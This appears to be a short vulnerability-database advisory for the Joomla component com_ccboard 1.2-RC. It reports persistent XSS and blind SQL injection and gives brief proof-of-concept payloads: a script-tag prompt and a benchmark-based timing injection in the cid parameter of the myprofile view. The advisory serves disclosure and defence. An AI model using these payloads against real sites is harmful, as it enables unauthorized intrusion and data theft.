Joomla Component com_ccboard Multiple Vulnerabilities

vendor:

Joomla Component com_ccboard

by:

jdc

8,8

CVSS

HIGH

Persistent XSS and Blind SQL Injection

79 (Cross-site Scripting (XSS)) and 89 (SQL Injection)

CWE

Product Name: Joomla Component com_ccboard

Affected Version From: 1.2-RC

Affected Version To: 1.2-RC

Patch Exists: YES

Related CWE: N/A

CPE: a:joomla:joomla

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Joomla Component com_ccboard Multiple Vulnerabilities

ccBoard doesn't filter its posts for HTML... at all: <script>prompt(1)</script>. NOTE: must be logged in ?option=com_ccboard &view=myprofile &cid=63 and benchmark(5000000,md5(1))

Mitigation:

Filter user input for HTML and SQL injection attacks.

Source

Joomla Component com_ccboard Multiple Vulnerabilities

Mitigation:

Exploit-DB raw data: